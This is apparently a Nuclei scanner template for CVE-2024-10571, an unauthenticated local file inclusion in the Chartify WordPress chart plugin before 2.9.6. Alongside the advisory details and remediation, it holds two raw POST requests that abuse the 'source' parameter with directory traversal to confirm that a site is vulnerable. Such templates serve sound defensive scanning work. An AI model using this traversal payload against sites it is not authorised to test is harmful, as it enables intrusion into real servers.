id: CVE-2024-10571

info:
  name: Chartify – WordPress Chart Plugin < 2.9.6 - Local File Inclusion
  author: iamnoooob,pdresearch
  severity: critical
  description: |
    The Chartify – WordPress Chart Plugin plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.9.5 via the 'source' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.
  impact: |
    Unauthenticated attackers can include and execute arbitrary PHP files via the source parameter, potentially achieving complete server compromise.
  remediation: |
    Update Chartify plugin to version 2.9.6 or later.
  reference:
    - https://plugins.trac.wordpress.org/browser/chart-builder/tags/2.9.6/admin/partials/charts/actions/chart-builder-charts-actions-options.php?rev=3184238
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/d4837258-c749-4194-926c-22b67e20c1fc?source=cve
    - https://github.com/RandomRobbieBF/CVE-2024-10571
    - https://nvd.nist.gov/vuln/detail/CVE-2024-10571
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-10571
    cwe-id: CWE-98,NVD-CWE-Other
    epss-score: 0.8606
    epss-percentile: 0.99408
    cpe: cpe:2.3:a:ays-pro:chartify:*:*:*:*:free:wordpress:*:*
  metadata:
    vendor: ays-pro
    product: chartify
    framework: wordpress
    verified: true
    max-request: 2
    publicwww-query: "/wp-content/plugins/chart-builder/"
  tags: cve,cve2024,wp,wp-plugin,wordpress,chartify,chart-builder,lfi,vkev,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php?action=add&source=../../../../../../../../../../wp-content/plugins/chart-builder/admin/partials/features/chart-builder-plugin-featured-display&type=chart-js HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=ays_chart_admin_ajax&function=display_plugin_charts_page&

    matchers:
      - type: word
        part: header
        words:
          - PHPSESSID
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php?action=add&source=../../../../../../../../../../wp-content/plugins/chart-builder/uninstall&type=chart-js HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=ays_chart_admin_ajax&function=display_plugin_charts_page

    matchers:
      - type: dsl
        dsl:
          - contains_all(body, "ays-chart-heading-box", "View Documentation")
          - status_code == 200
        condition: and
# digest: 4a0a0047304502200fa9ee4971f687fbbe3de406771461d2321861b4b9a09b67f61ef84ef8d301d902210088f4ee45081c4979bfe68586e6813563d5b419028827bbed80135f216e92ca9d:922c64590222798bb761d5b6d8e72950